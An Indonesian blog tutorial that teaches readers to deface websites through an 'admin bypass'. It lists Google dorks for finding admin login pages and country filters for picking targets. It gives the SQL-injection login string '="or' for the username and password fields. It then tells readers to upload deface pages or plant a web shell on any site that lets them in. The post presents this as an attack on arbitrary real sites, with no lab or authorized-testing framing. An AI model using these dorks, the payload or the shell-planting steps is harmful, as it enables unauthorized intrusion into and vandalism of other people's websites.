-->

Tutorial Cara Deface POC Bypass Admin by Gengindo.Me

Tutorial Cara Deface POC Bypass Admin by Gengindo.Me

Tutorial Cara Deface POC Bypass Admin - Sebelumnya saya sudah memberikan postingan mengenai tutorial cara belajar deface dengan menggunakan POC Lokomendia CMS. Nah kali ini kita akan mencoba membahas tentang tutorial cara deface dengan poc bypass admin, cara metode deface dengan bypass admin memang merupakan alternartif yang harus diketahui ketika anda ingin belajar cara deface website.

Deface poc bypass admin cara kerjanya yaitu mengambil keuntungan dari barisan kode script di sebuah website. Dengan memanfaatkan kesalahan penulisan kode ini kita bisa membypass admin website setelah mengetahui admin login access.

Berikut dork deface poc bypass admin

Admin.php?id=
Admin/login.php
Login.php intitle:"admin login"
Login.php intitle:"admin area "
Login.php intitle:"administrator "
Administrator.php
inurl:/admin.php intext:login intext:adminsitrator
inurl:/admin/index.php intext:username
inurl :/admin/Admin.php intext:login
inurl:/administrator/login.php intext:username site:.
inurl:/login.php intext:administrator intext:login

Note: kalian juga bisa mengembangkan dork diatas dengan cara menambahkan dan menargetkan site pada negara tertentu dengan menambahkan keyword berikut:

Site:ca
Site:sg
Site:my
Site:id

Ketika dork sudah dipersiapkan selanjutnya tinggal lakukan dorking di google menggunakan dork yang kalian miliki. Selanjutnya pilih salah satu website yang ada di google.

Selanjutnya kemudian tinggal lakukan login dengan mengisi username dan password dibawah ini

'="or'

Apabila berhasil masuk ke dalam login panel maka otomatis website yang anda pilih merupakan website yang vuln, namun apabila gagal silahkan lakukan login kembali pada website yang sudah di dorking sebelumnya.

Ketika telah login ke dalam panel admin website silahkan untuk mengupload file deface atau mengupload dan menanamkan file shell ke dalam website tersebut, setelah itu anda sudah selesai berhasil melakukan deface dengan tutorial cara deface dengan menggunakan metode poc bypass admin.

Salam sukses selalu. Jangan lupa share dan follow gengindo.me

0 Response to "Tutorial Cara Deface POC Bypass Admin by Gengindo.Me"

Post a Comment

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel